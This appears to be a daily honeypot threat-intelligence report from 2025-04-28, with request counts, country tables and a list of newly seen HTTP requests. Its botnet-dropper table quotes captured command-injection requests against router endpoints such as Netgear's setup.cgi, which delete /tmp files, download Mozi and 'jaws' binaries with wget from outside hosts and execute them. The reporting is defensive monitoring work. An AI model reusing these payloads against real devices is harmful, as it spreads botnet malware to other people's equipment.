Skip to main content
  1. Daily-Posts/

Report: 2025-04-28

·428 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-04-28
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 5 stage 1 IP address(es), linked to 4 dropper URL(s).

There are 27 new requests that have never been observed before (these were added to the monitored request database.).

A total of 2097 requests were recorded during the day, originating from 5 different countries, with a peak of 455 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
103.42.243.8627;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
123.4.49.93GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://123.4.49.93:44339/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
59.96.140.75GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://59.96.140.75:33894/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
90.189.112.148GET /shell?cd+/tmp;rm+-rf+*;wget+31.58.51.98/jaws;sh+/tmp/jaws HTTP/1.1
103.48.64.12227;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
2321GET /README.md HTTP/1.1
2381GET /6Rmh HTTP/1.1
2391GET /Fx6h HTTP/1.1
2561GET /Odin/http/call1745828103 HTTP/1.1
2631GET /Q2qh HTTP/1.1
2651GET /n3nN HTTP/1.1
2711GET /odinhttpcall1745828103 HTTP/1.1
2721GET /OdinHttpCall1745828103 HTTP/1.1
2771GET /rC5r HTTP/1.1
2781GET /Ns9c HTTP/1.1
2931GET /tmp.php HTTP/1.1
3121\x04\x01\x01\xBB@\xE9\xA1iadm:12345\x00
3181GET /config/index?time=1745844135156373232 HTTP/1.1
3321POST /api/user/binLookup?time=1745848300884437028 HTTP/1.1
3351GET /api/bin/440393?time=1745848300387524762 HTTP/1.1
3421\x04\x01\x01\xBB@\xE9\xA1i\x00
3511GET /odinhttpcall1745867188 HTTP/1.1
3521GET /odinhttpcall1745867310 HTTP/1.1
3531GET /OdinHttpCall1745867310 HTTP/1.1
3541GET /Odin/http/call1745867310 HTTP/1.1
3581GET /OdinHttpCall1745867188 HTTP/1.1
3591GET /Odin/http/call1745867188 HTTP/1.1
3681GET /HaRa HTTP/1.1
3691GET /eTo5 HTTP/1.1
3901GET /jasperserverTest/login.html HTTP/1.1
4001GET /config/index?time=1745841660963416564 HTTP/1.1
4011POST /api/user/binLookup?time=1745844547990456700 HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0455US
1314GB
2262DE
3262NL
4172SC
5105VN
692PL
766BG
860HK
945CN
1045KZ
1141IN
1235UA
1318ZA
1418GH
1510FR
1610CH
178JP
187KR
196PT
206LT
216AU
226CA
236AO
245RU
255SG
265TR
274BE
283ID
293RO
302TH
312MC
322BR
332PH
342FI
352ES
361KE
371IR
381IT
391NZ
401AR

Related

Report: 2025-04-27
·571 words
Repport Daily
Report: 2025-04-26
·589 words
Repport Daily
Report: 2025-04-25
·529 words
Repport Daily